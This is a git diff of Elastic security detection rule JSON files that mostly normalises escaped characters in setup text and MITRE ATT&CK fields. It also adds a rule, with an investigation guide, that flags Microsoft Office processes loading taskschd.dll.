Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json index 7bba67449cd..8077dcc289c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_107.json 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json index 33fa71f27e7..9f869c8b825 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_103.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json index b166dc503e6..c3d0efc1f06 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_104.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json index 2c396bde06b..1563576d5f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_105.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json index 90988b39e33..b6a2bfdb04b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_106.json 
@@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json index 78c3d0a805f..21de33d9b4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_107.json 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "b9960fef-82c6-4816-befa-44745030e917", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json index 1c050924777..763581c0924 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_102.json 
@@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json index b7197114215..c76af9e3088 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_103.json 
@@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json index 460ae4744f3..fa18ef710ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_104.json 
@@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json index 7b6c473a02c..b49bc5c718b 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_105.json 
@@ -64,7 +64,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json index d462014a06e..bde666baffc 100644 --- a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_106.json 
@@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107.json new file mode 100644 index 00000000000..d35cc028c79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_107.json 
@@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Image Load (taskschd.dll) from MS Office", + "note": "## Triage and analysis\n\n### Investigating Suspicious Image Load (taskschd.dll) from MS Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. These attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\n`taskschd.dll` provides Command Object Model (COM) interfaces for the Windows Task Scheduler service, allowing developers to programmatically manage scheduled tasks.\n\nThis rule looks for an MS Office process loading `taskschd.dll`, which may indicate an adversary abusing COM to configure a scheduled task. This can happen as part of a phishing attack, when a malicious office document registers the scheduled task to download the malware \"stage 2\" or to establish persistent access.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Analyze the host's scheduled tasks and explore the related Windows events to determine if tasks were created or deleted (Event IDs 4698 and 4699).\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the files downloaded during the past 24 hours.\n - Identify files that are related or can be executed in MS Office.\n - Identify and analyze macros that these documents contain.\n - Identify suspicious traits in the office macros, such as encoded or encrypted sections.\n- Retrieve the suspicious files identified in the previous step and determine if they are malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related Rules\n\n- Suspicious WMI Image Load from MS Office - 891cb88e-441a-4c3e-be2d-120d99fe7b0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 